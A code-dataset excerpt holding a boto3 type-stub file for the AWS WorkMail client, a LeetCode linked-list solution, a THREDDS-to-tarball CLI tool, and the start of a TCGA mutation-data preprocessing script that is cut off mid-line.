documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_groups)\n \"\"\"\n def list_impersonation_roles(\n self, *, OrganizationId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListImpersonationRolesResponseTypeDef:\n \"\"\"\n Lists all the impersonation roles for the given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_impersonation_roles)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_impersonation_roles)\n \"\"\"\n def list_mail_domains(\n self, *, OrganizationId: str, MaxResults: int = None, NextToken: str = None\n ) -> ListMailDomainsResponseTypeDef:\n \"\"\"\n Lists the mail domains in a given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_mail_domains)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_mail_domains)\n \"\"\"\n def list_mailbox_export_jobs(\n self, *, OrganizationId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListMailboxExportJobsResponseTypeDef:\n \"\"\"\n Lists the mailbox export jobs started for the specified organization within the\n last seven days.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_mailbox_export_jobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_mailbox_export_jobs)\n \"\"\"\n def list_mailbox_permissions(\n self, *, OrganizationId: str, EntityId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListMailboxPermissionsResponseTypeDef:\n \"\"\"\n Lists the mailbox permissions associated with a user, group, or resource\n mailbox.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_mailbox_permissions)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_mailbox_permissions)\n \"\"\"\n def list_mobile_device_access_overrides(\n self,\n *,\n OrganizationId: str,\n UserId: str = None,\n DeviceId: str = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListMobileDeviceAccessOverridesResponseTypeDef:\n \"\"\"\n Lists all the mobile device access overrides for any given combination of\n WorkMail organization, user, or device.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_mobile_device_access_overrides)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_mobile_device_access_overrides)\n \"\"\"\n def list_mobile_device_access_rules(\n self, *, OrganizationId: str\n ) -> ListMobileDeviceAccessRulesResponseTypeDef:\n \"\"\"\n Lists the mobile device access rules for the specified WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_mobile_device_access_rules)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_mobile_device_access_rules)\n \"\"\"\n def list_organizations(\n self, *, NextToken: str = None, MaxResults: int = None\n ) -> ListOrganizationsResponseTypeDef:\n \"\"\"\n Returns summaries of the customer's organizations.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_organizations)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_organizations)\n \"\"\"\n def list_resource_delegates(\n self, *, OrganizationId: str, ResourceId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListResourceDelegatesResponseTypeDef:\n \"\"\"\n Lists the delegates associated with a resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_resource_delegates)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_resource_delegates)\n \"\"\"\n def list_resources(\n self, *, OrganizationId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListResourcesResponseTypeDef:\n \"\"\"\n Returns summaries of the organization's resources.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_resources)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_resources)\n \"\"\"\n def list_tags_for_resource(self, *, ResourceARN: str) -> ListTagsForResourceResponseTypeDef:\n \"\"\"\n Lists the tags applied to an WorkMail organization resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_tags_for_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_tags_for_resource)\n \"\"\"\n def list_users(\n self, *, OrganizationId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListUsersResponseTypeDef:\n \"\"\"\n Returns summaries of the organization's users.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_users)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_users)\n \"\"\"\n def put_access_control_rule(\n self,\n *,\n Name: str,\n Effect: AccessControlRuleEffectType,\n Description: str,\n OrganizationId: str,\n IpRanges: List[str] = None,\n NotIpRanges: List[str] = None,\n Actions: List[str] = None,\n NotActions: List[str] = None,\n UserIds: List[str] = None,\n NotUserIds: List[str] = None,\n ImpersonationRoleIds: List[str] = None,\n NotImpersonationRoleIds: List[str] = None\n ) -> Dict[str, Any]:\n \"\"\"\n Adds a new access control rule for the specified organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.put_access_control_rule)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#put_access_control_rule)\n \"\"\"\n def put_email_monitoring_configuration(\n self, *, OrganizationId: str, RoleArn: str, LogGroupArn: str\n ) -> Dict[str, Any]:\n \"\"\"\n Creates or updates the email monitoring configuration for a specified\n organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.put_email_monitoring_configuration)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#put_email_monitoring_configuration)\n \"\"\"\n def put_inbound_dmarc_settings(self, *, OrganizationId: str, Enforced: bool) -> Dict[str, Any]:\n \"\"\"\n Enables or disables a DMARC policy for a given organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.put_inbound_dmarc_settings)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#put_inbound_dmarc_settings)\n \"\"\"\n def put_mailbox_permissions(\n self,\n *,\n OrganizationId: str,\n EntityId: str,\n GranteeId: str,\n PermissionValues: List[PermissionTypeType]\n ) -> Dict[str, Any]:\n \"\"\"\n Sets permissions for a user, group, or resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.put_mailbox_permissions)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#put_mailbox_permissions)\n \"\"\"\n def put_mobile_device_access_override(\n self,\n *,\n OrganizationId: str,\n UserId: str,\n DeviceId: str,\n Effect: MobileDeviceAccessRuleEffectType,\n Description: str = None\n ) -> Dict[str, Any]:\n \"\"\"\n Creates or updates a mobile device access override for the given WorkMail\n organization, user, and device.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.put_mobile_device_access_override)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#put_mobile_device_access_override)\n \"\"\"\n def put_retention_policy(\n self,\n *,\n OrganizationId: str,\n Name: str,\n FolderConfigurations: List[\"FolderConfigurationTypeDef\"],\n Id: str = None,\n Description: str = None\n ) -> Dict[str, Any]:\n \"\"\"\n Puts a retention policy to the specified organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.put_retention_policy)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#put_retention_policy)\n \"\"\"\n def register_mail_domain(\n self, *, OrganizationId: str, DomainName: str, ClientToken: str = None\n ) -> Dict[str, Any]:\n \"\"\"\n Registers a new domain in WorkMail and SES, and configures it for use by\n WorkMail.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.register_mail_domain)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#register_mail_domain)\n \"\"\"\n def register_to_work_mail(\n self, *, OrganizationId: str, EntityId: str, Email: str\n ) -> Dict[str, Any]:\n \"\"\"\n Registers an existing and disabled user, group, or resource for WorkMail use by\n associating a mailbox and calendaring capabilities.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.register_to_work_mail)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#register_to_work_mail)\n \"\"\"\n def reset_password(self, *, OrganizationId: str, UserId: str, Password: str) -> Dict[str, Any]:\n \"\"\"\n Allows the administrator to reset the password for a user.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.reset_password)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#reset_password)\n \"\"\"\n def start_mailbox_export_job(\n self,\n *,\n ClientToken: str,\n OrganizationId: str,\n EntityId: str,\n RoleArn: str,\n KmsKeyArn: str,\n S3BucketName: str,\n S3Prefix: str,\n Description: str = None\n ) -> StartMailboxExportJobResponseTypeDef:\n \"\"\"\n Starts a mailbox export job to export MIME-format email messages and calendar\n items from the specified mailbox to the specified Amazon Simple Storage Service\n (Amazon S3) bucket.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.start_mailbox_export_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#start_mailbox_export_job)\n \"\"\"\n def tag_resource(self, *, ResourceARN: str, Tags: List[\"TagTypeDef\"]) -> Dict[str, Any]:\n \"\"\"\n Applies the specified tags to the specified WorkMailorganization resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.tag_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#tag_resource)\n \"\"\"\n def test_availability_configuration(\n self,\n *,\n OrganizationId: str,\n DomainName: str = None,\n EwsProvider: \"EwsAvailabilityProviderTypeDef\" = None,\n LambdaProvider: \"LambdaAvailabilityProviderTypeDef\" = None\n ) -> TestAvailabilityConfigurationResponseTypeDef:\n \"\"\"\n Performs a test on an availability provider to ensure that access is allowed.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.test_availability_configuration)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#test_availability_configuration)\n \"\"\"\n def untag_resource(self, *, ResourceARN: str, TagKeys: List[str]) -> Dict[str, Any]:\n \"\"\"\n Untags the specified tags from the specified WorkMail organization resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.untag_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#untag_resource)\n \"\"\"\n def update_availability_configuration(\n self,\n *,\n OrganizationId: str,\n DomainName: str,\n EwsProvider: \"EwsAvailabilityProviderTypeDef\" = None,\n LambdaProvider: \"LambdaAvailabilityProviderTypeDef\" = None\n ) -> Dict[str, Any]:\n \"\"\"\n Updates an existing `AvailabilityConfiguration` for the given WorkMail\n organization and domain.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.update_availability_configuration)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#update_availability_configuration)\n \"\"\"\n def update_default_mail_domain(self, *, OrganizationId: str, DomainName: str) -> Dict[str, Any]:\n \"\"\"\n Updates the default mail domain for an organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.update_default_mail_domain)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#update_default_mail_domain)\n \"\"\"\n def update_impersonation_role(\n self,\n *,\n OrganizationId: str,\n ImpersonationRoleId: str,\n Name: str,\n Type: ImpersonationRoleTypeType,\n Rules: List[\"ImpersonationRuleTypeDef\"],\n Description: str = None\n ) -> Dict[str, Any]:\n \"\"\"\n Updates an impersonation role for the given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.update_impersonation_role)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#update_impersonation_role)\n \"\"\"\n def update_mailbox_quota(\n self, *, OrganizationId: str, UserId: str, MailboxQuota: int\n ) -> Dict[str, Any]:\n \"\"\"\n Updates a user's current mailbox quota for a specified organization and user.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.update_mailbox_quota)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#update_mailbox_quota)\n \"\"\"\n def update_mobile_device_access_rule(\n self,\n *,\n OrganizationId: str,\n MobileDeviceAccessRuleId: str,\n Name: str,\n Effect: MobileDeviceAccessRuleEffectType,\n Description: str = None,\n DeviceTypes: List[str] = None,\n NotDeviceTypes: List[str] = None,\n DeviceModels: List[str] = None,\n NotDeviceModels: List[str] = None,\n DeviceOperatingSystems: List[str] = None,\n NotDeviceOperatingSystems: List[str] = None,\n DeviceUserAgents: List[str] = None,\n NotDeviceUserAgents: List[str] = None\n ) -> Dict[str, Any]:\n \"\"\"\n Updates a mobile device access rule for the specified WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.update_mobile_device_access_rule)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#update_mobile_device_access_rule)\n \"\"\"\n def update_primary_email_address(\n self, *, OrganizationId: str, EntityId: str, Email: str\n ) -> Dict[str, Any]:\n \"\"\"\n Updates the primary email for a user, group, or resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.update_primary_email_address)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#update_primary_email_address)\n \"\"\"\n def update_resource(\n self,\n *,\n OrganizationId: str,\n ResourceId: str,\n Name: str = None,\n BookingOptions: \"BookingOptionsTypeDef\" = None\n ) -> Dict[str, Any]:\n \"\"\"\n Updates data for the resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.update_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#update_resource)\n \"\"\"\n @overload\n def get_paginator(self, operation_name: Literal[\"list_aliases\"]) -> ListAliasesPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListAliases)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listaliasespaginator)\n \"\"\"\n @overload\n def get_paginator(\n self, operation_name: Literal[\"list_availability_configurations\"]\n ) -> ListAvailabilityConfigurationsPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListAvailabilityConfigurations)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listavailabilityconfigurationspaginator)\n \"\"\"\n @overload\n def get_paginator(\n self, operation_name: Literal[\"list_group_members\"]\n ) -> ListGroupMembersPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListGroupMembers)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listgroupmemberspaginator)\n \"\"\"\n @overload\n def get_paginator(self, operation_name: Literal[\"list_groups\"]) -> ListGroupsPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListGroups)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listgroupspaginator)\n \"\"\"\n @overload\n def get_paginator(\n self, operation_name: Literal[\"list_mailbox_permissions\"]\n ) -> ListMailboxPermissionsPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListMailboxPermissions)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listmailboxpermissionspaginator)\n \"\"\"\n @overload\n def get_paginator(\n self, operation_name: Literal[\"list_organizations\"]\n ) -> ListOrganizationsPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListOrganizations)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listorganizationspaginator)\n \"\"\"\n @overload\n def get_paginator(\n self, operation_name: Literal[\"list_resource_delegates\"]\n ) -> ListResourceDelegatesPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListResourceDelegates)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listresourcedelegatespaginator)\n \"\"\"\n @overload\n def get_paginator(self, operation_name: Literal[\"list_resources\"]) -> ListResourcesPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListResources)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listresourcespaginator)\n \"\"\"\n @overload\n def get_paginator(self, operation_name: Literal[\"list_users\"]) -> ListUsersPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListUsers)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listuserspaginator)\n \"\"\"\n","sub_path":"typings/mypy_boto3_workmail/client.pyi","file_name":"client.pyi","file_ext":"pyi","file_size_in_byte":57132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"371254267","text":"__author__ = 'ruhuajiang'\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def deleteDuplicates(self, head):\n if not head:\n return\n dummy = ListNode(-1)\n dummy.next = head\n prev = dummy\n slow = head\n fast = slow\n count = 0\n while(fast):\n if fast.val == slow.val:\n fast = fast.next\n count+=1\n continue\n if count > 1:\n prev.next = fast\n slow = fast\n count=0\n else:\n prev = slow\n slow = fast\n count =0\n\n if count > 1:\n prev.next = None\n return dummy.next\n\n\n\n\n\n\n\n\n","sub_path":"leetcode/Remove Duplicates from Sorted List II.py","file_name":"Remove Duplicates from Sorted List II.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"204217083","text":"import click\nimport tarfile\nfrom odc.io.tar import add_txt_file, tar_mode\nfrom odc.thredds import download_yamls, thredds_find_glob\n\n\n@click.command(\"thredds-to-tar\")\n@click.option(\n \"--thredds_catalogue\",\n \"-c\",\n type=str,\n required=True,\n help=\"The THREDDS catalogue endpoint\",\n)\n@click.option(\n \"--skips\",\n \"-s\",\n type=str,\n multiple=True,\n help=\"Pattern to ignore when THREDDS crawling\",\n)\n@click.option(\n \"--select\",\n \"-t\",\n type=str,\n required=True,\n help=\"Target file pattern to match for yaml\",\n)\n@click.option(\n \"--workers\",\n \"-w\",\n type=int,\n default=4,\n help=\"Number of thredds crawler workers to use\",\n)\n@click.option(\n \"--outfile\", type=str, default=\"metadata.tar.gz\", help=\"Sets the output file name\"\n)\ndef cli(thredds_catalogue, skips, select, workers, outfile):\n \"\"\"Download Metadata from THREDDS server to tarball\n\n Example:\n\n \\b\n Download files in directory that match `*yaml` and store them as a tar\n > thredds-to-tar -c \"http://dapds00.nci.org.au/thredds/catalog/if87/2018-11-29/\"\n -t \".*ARD-METADATA.yaml\" -s '.*NBAR.*' -s '.*SUPPLEMENTARY.*'\n -s '.*NBART.*' -s '.*/QA/.*' -w 8 --outfile 2018-11-29.tar.gz\n\n \"\"\"\n print(\n \"Searching {thredds_catalogue} for matching files\".format(\n thredds_catalogue=thredds_catalogue\n )\n )\n urls = thredds_find_glob(thredds_catalogue, skips, [select], workers)\n\n print(\"Found {0} metadata urls\".format(str(len(urls))))\n\n yamls = download_yamls(urls, workers)\n\n # jam it all in a tar\n tar_opts = dict(\n name=outfile, mode=\"w\" + tar_mode(gzip=True, xz=True, is_pipe=False)\n )\n with tarfile.open(**tar_opts) as tar:\n for yaml in yamls:\n add_txt_file(tar=tar, content=yaml[0], fname=yaml[1])\n\n print(\"Done!\")\n\n\nif __name__ == \"__main__\":\n cli()\n","sub_path":"apps/cloud/odc/apps/cloud/thredds_to_tar.py","file_name":"thredds_to_tar.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"201562093","text":"import pandas as pd\nimport numpy as np\nimport pickle\nimport pyranges as pr\nimport pathlib\npath = pathlib.Path.cwd()\nif path.stem == 'ATGC2':\n cwd = path\nelse:\n cwd = list(path.parents)[::-1][path.parts.index('ATGC2')]\n##your path to the files directory\nfile_path = cwd / 'files/'\n\n# load tcga clinical file download from 'https://api.gdc.cancer.gov/data/1b5f413e-a8d1-4d10-92eb-7c4ae739ed81'\ntcga_sample_table = pd.read_csv(file_path / 'TCGA-CDR-SupplementalTableS1.tsv', sep='\\t').iloc[:, 1:]\ntcga_sample_table['histological_type'].fillna('', inplace=True)\n\n# load pathology annotations from asb\ntumor_types = pd.read_csv(file_path / 'tumor_types_NCI-T.csv', sep='\\t')\ntumor_types.fillna('', inplace=True)\ntcga_sample_table = pd.merge(tcga_sample_table, tumor_types[['type', 'histological_type', 'NCI-T Label', 'NCI-T Code']], how='left', on=['type', 'histological_type'])\n\n# tcga mc3 filename download from 'https://gdc.cancer.gov/about-data/publications/mc3-2017'\nmc3_file_name = 'mc3.v0.2.8.CONTROLLED.maf'\n# these are a core set of basic columns we would want\nusecols = ['Hugo_Symbol', 'Hugo_Symbol', 'Center', 'NCBI_Build', 'Chromosome', 'Start_Position', 'End_Position', 'STRAND', 'Variant_Classification', 'Variant_Type', 'Consequence', 'Reference_Allele', 'Tumor_Seq_Allele2', 't_ref_count', 't_alt_count', 'Tumor_Sample_Barcode', 'CONTEXT', 'FILTER', 'CDS_position']\ntcga_maf = pd.read_csv(file_path / mc3_file_name, sep='\\t', usecols=usecols, low_memory=False)\n##The MAF contains nonpreferred pairs which results in some samples having duplicated variants\nfilters = ['PASS', 'NonExonic,bitgt', 'NonExonic,bitgt,wga', 'NonExonic', 'NonExonic,wga', 'bitgt', 'bitgt,wga', 'wga', \\\n 'broad_PoN_v2', 'NonExonic,bitgt,broad_PoN_v2', 'NonExonic,bitgt,broad_PoN_v2,wga', 'NonExonic,broad_PoN_v2', \\\n 'broad_PoN_v2,wga', 'bitgt,broad_PoN_v2', 'NonExonic,broad_PoN_v2,wga', 'bitgt,broad_PoN_v2,wga']\n\ntcga_maf = tcga_maf.loc[tcga_maf['FILTER'].isin(filters)]\ntcga_maf = tcga_maf.loc[tcga_maf['Chromosome'] != 'MT']\n\n# df of counts via groupby, could add other metrics derived from mc maf here\nnon_syn = ['Missense_Mutation', 'Nonsense_Mutation', 'Frame_Shift_Del', 'Frame_Shift_Ins', 'In_Frame_Del', 'In_Frame_Ins', 'Nonstop_Mutation']\ntcga_counts = tcga_maf[['Variant_Classification', 'Tumor_Sample_Barcode']].groupby('Tumor_Sample_Barcode').apply(lambda x: pd.Series([len(x), (x['Variant_Classification'].isin(non_syn)).sum()], index=['all_counts', 'non_syn_counts']))\ntcga_counts['non_syn_tmb'] = tcga_counts['non_syn_counts'] / 31.85\ntcga_counts.reset_index(inplace=True)\n# linkage to pancan clinical annotation table via sample barcode\ntcga_counts['bcr_patient_barcode'] = tcga_counts['Tumor_Sample_Barcode'].str.extract(r'^([^-]+-[^-]+-[^-]+)-')\ntcga_counts['bcr_sample_barcode'] = tcga_counts['Tumor_Sample_Barcode'].str.extract(r'^([^-]+-[^-]+-[^-]+-[^-]+)-')\n\n# join to clinical annotation for data in mc3 only, this will add Tumor_Sample_Barcode also to the tcga_sample_table\ntcga_sample_table = pd.merge(tcga_sample_table, tcga_counts, how='right', on='bcr_patient_barcode')\n\n# add MANTIS data downloaded from 'https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5972025/bin/NIHMS962713-supplement-File_S2.xlsx'\nmantis_file_name = 'NIHMS962713-supplement-File_S2.csv'\nmantis_df = pd.read_csv(file_path / mantis_file_name, sep='\\t')\nmantis_df['Tumor_Sample_Barcode'] = mantis_df['Tumor Filename'].str.extract(r'(TCGA[^\\.]+)\\.')\ntcga_sample_table = pd.merge(tcga_sample_table, mantis_df[['Tumor_Sample_Barcode', 'MANTIS Score']], how='left', on='Tumor_Sample_Barcode')\n\n#add msi pcr labels, data processing and data sources available at ATGC/files/msi_ground_truth/\nmsi = pickle.load(open(file_path / 'msi_ground_truth' / 'msi_labels.pkl', 'rb'))\ntcga_sample_table = pd.merge(tcga_sample_table, msi, how='left', left_on='bcr_patient_barcode', right_index=True)\ntcga_sample_table.rename(columns={0: 'msi'}, inplace=True)\n\n\n##not every kit covered the entire exome, kit information is only available in the readgroups from the API\nimport requests\nimport json\ncases = list(tcga_sample_table['bcr_patient_barcode'])\n#\ncases_endpt = 'https://api.gdc.cancer.gov/cases'\nresponses = []\nstep = 100\ncount = 0\nX = True\nwhile X:\n print(count)\n if (count+1)*step >= len(cases):\n value = cases[count*step:]\n X = False\n value = cases[count*step: (count+1)*step]\n count += 1\n filt = {\"op\": \"in\",\n \"content\": {\n \"field\": \"cases.submitter_id\",\n \"value\": value\n }\n }\n params = {'filters': json.dumps(filt), \"expand\": \"files.analysis.metadata.read_groups\", 'size': '100'}\n response = requests.get(cases_endpt, params=params).json()\n responses.append(response)\n\n##If you don't want to use the API again save the data\nwith open(file_path / 'responses_controlled.pkl', 'wb') as f:\n pickle.dump([cases, responses], f)\n\n# with open(file_path / 'responses_controlled.pkl', 'rb') as f:\n# cases, responses = pickle.load(f)\n\n\nflattened_responses = []\nfor response in responses:\n for i in response[\"data\"][\"hits\"]:\n flattened_responses.append(i)\n\n##map a sample to its barcode\ncase_to_barcode = {i: j for i, j in zip(tcga_sample_table['bcr_patient_barcode'], tcga_sample_table['Tumor_Sample_Barcode'])}\n\n##will need this later\ncancer_dict = {i: j for i, j in zip(tcga_sample_table['bcr_patient_barcode'], tcga_sample_table['type'])}\n\n##the responses are not in order requested from the API\nhits = {}\nfor case in case_to_barcode:\n for j in flattened_responses:\n for k in j['submitter_sample_ids']:\n if case in k:\n hits[case] = j\n break\n\n\ndata = {}\nfor case in case_to_barcode:\n for i in hits[case]['files']:\n for k in i['analysis']['metadata']['read_groups']:\n if k['library_strategy'] == 'WXS':\n Y = False\n sample = k['experiment_name']\n if sample[-2:] == '-1':\n sample = sample[:-2]\n if sample == case_to_barcode[case]:\n key = case_to_barcode[case]\n Y = True\n else:\n sample = sample[5:]\n temp_sample = case_to_barcode[case][5:]\n if sample == temp_sample:\n key = case_to_barcode[case]\n Y = True\n else:\n if cancer_dict[case] == 'LAML' and 'TCGA' not in k['experiment_name']:\n if case in ['TCGA-AB-2918', 'TCGA-AB-2934', 'TCGA-AB-2864', 'TCGA-AB-2909', 'TCGA-AB-2807', 'TCGA-AB-2808', 